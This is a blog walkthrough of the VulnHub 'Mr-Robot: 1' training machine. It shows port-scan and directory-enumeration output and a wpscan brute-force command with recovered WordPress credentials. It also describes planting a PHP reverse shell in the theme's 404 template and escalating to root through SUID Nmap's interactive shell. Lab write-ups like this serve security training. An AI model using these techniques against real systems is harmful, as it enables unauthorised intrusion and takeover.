Open in app

Sign in

Write

Sign in

VulnHub — Mr Robot

Raj Singh
4 min readOct 4, 2019

--

Mr-Robot: 1

Mr-Robot: 1, made by Leon Johnson. Download & walkthrough links are available.

www.vulnhub.com

Nmap

PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn’t have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn’t have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015–09–16T10:45:03
| Not valid after: 2025–09–13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
|_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
MAC Address: 08:00:27:6B:62:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10–4.11
Uptime guess: 198.840 days (since Tue Mar 19 17:05:45 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros

So we are having https and http port to be open so let’s start enumerating the ports with dirsearch and nikto

Dirsearch

└──╼ #dirsearch -u http://10.0.0.48 -e/ -x 403,500 -r_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )Extensions: / | Threads: 10 | Wordlist size: 6084Error Log: /root/predator/others/hackthebox/scripts/dirsearch/logs/errors-19–10–04_15–39–45.logTarget: http://10.0.0.48[15:39:45] Starting: 
[15:39:46] 200–1KB — /
[15:40:38] 301–231B — /admin -> http://10.0.0.48/admin/
[15:40:40] 200–1KB — /admin/
[15:40:43] 200–1KB — /admin/?/login
[15:40:48] 200–1KB — /admin/index
[15:40:49] 200–1KB — /admin/index.html
[15:41:45] 301–231B — /audio -> http://10.0.0.48/audio/
[15:41:58] 301–230B — /blog -> http://10.0.0.48/blog/
[15:42:24] 301–229B — /css -> http://10.0.0.48/css/
[15:42:47] 200–0B — /favicon.ico
[15:43:05] 301–232B — /images -> http://10.0.0.48/images/
[15:43:11] 200–1KB — /index.html
[15:43:15] 200–504KB — /intro
[15:43:18] 301–228B — /js -> http://10.0.0.48/js/
[15:43:23] 200–309B — /license.txt
[15:44:34] 200–64B — /readme
[15:44:35] 200–64B — /readme.html
[15:44:39] 200–41B — /robots.txt
[15:44:54] 200–0B — /sitemap.xml.gz
[15:44:54] 200–0B — /sitemap.xml
[15:44:54] 200–0B — /sitemap
[15:45:38] 301–234B — /wp-admin -> http://10.0.0.48/wp-admin/
[15:45:40] 301 - 236B — /wp-content -> http://10.0.0.48/wp-content/
[15:45:41] 301–237B — /wp-includes -> http://10.0.0.48/wp-includes/
[15:45:42] 200–0B — /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[15:45:42] 200–0B — /wp-content/
[15:45:49] Starting: /
[15:45:54] 200–1KB — /
[15:46:37] 301–231B — /admin -> http://10.0.0.48/admin/
[15:46:39] 200–1KB — /admin/
[15:46:42] 200–1KB — /admin/?/login
[15:46:45] 200–1KB — /admin/index
[15:46:46] 200–1KB — /admin/index.html
[15:47:30] 301–231B — /audio -> http://10.0.0.48/audio/
[15:47:40] 301–230B — /blog -> http://10.0.0.48/blog/
[15:48:08] 301–229B — /css -> http://10.0.0.48/css/
[15:48:31] 200–0B — /favicon.ico

Here we found “key 1 of 3“ and a wordlist “fsocity.dic” at robots.txt , and found WordPress at /wp-admin , but we are not having the creds as we used fsocirty.dic as our wordlist

But let us sort the wordlist by using

cat fsocity.dic | sort -u > new

So we are having the word list and now let’s start brute force using with wpscan using

wpscan -U new -P new — url http://192.168.29.213/Username: elliot, Password: ER28-0652

After moving in we found editor option at appearance option , where we can edit any file so we edited (404 template) and replaced the original content with our php reverse shell script

Now when we search of any other directory which is not available at the wordpress it will show us 404 error but now after changing the content , when we search the wrong directory we will get our 404 to be executed and will get a reverse shell at our “nc”

Got reverse shell by calling [ http://10.0.0.48/wp-admin/boom ]

Got daemon user , and found md5 hash at robot directory

Hash after decryption — “abcdefghijklmnopqrstuvwxyz” password for robot user

So now when we run the LinEnum.sh we found the nmap is having suid on it so we used below commands for bypassing user privilege

nmap --interactive
nmap> !sh

And we got root (eid)

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Hacking
Vulnhub
Mr Robot
Raj Singh

--

--

Raj Singh
Raj Singh

Written by Raj Singh

54 Followers
9 Following

Security Researcher, Product Security Engineer

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams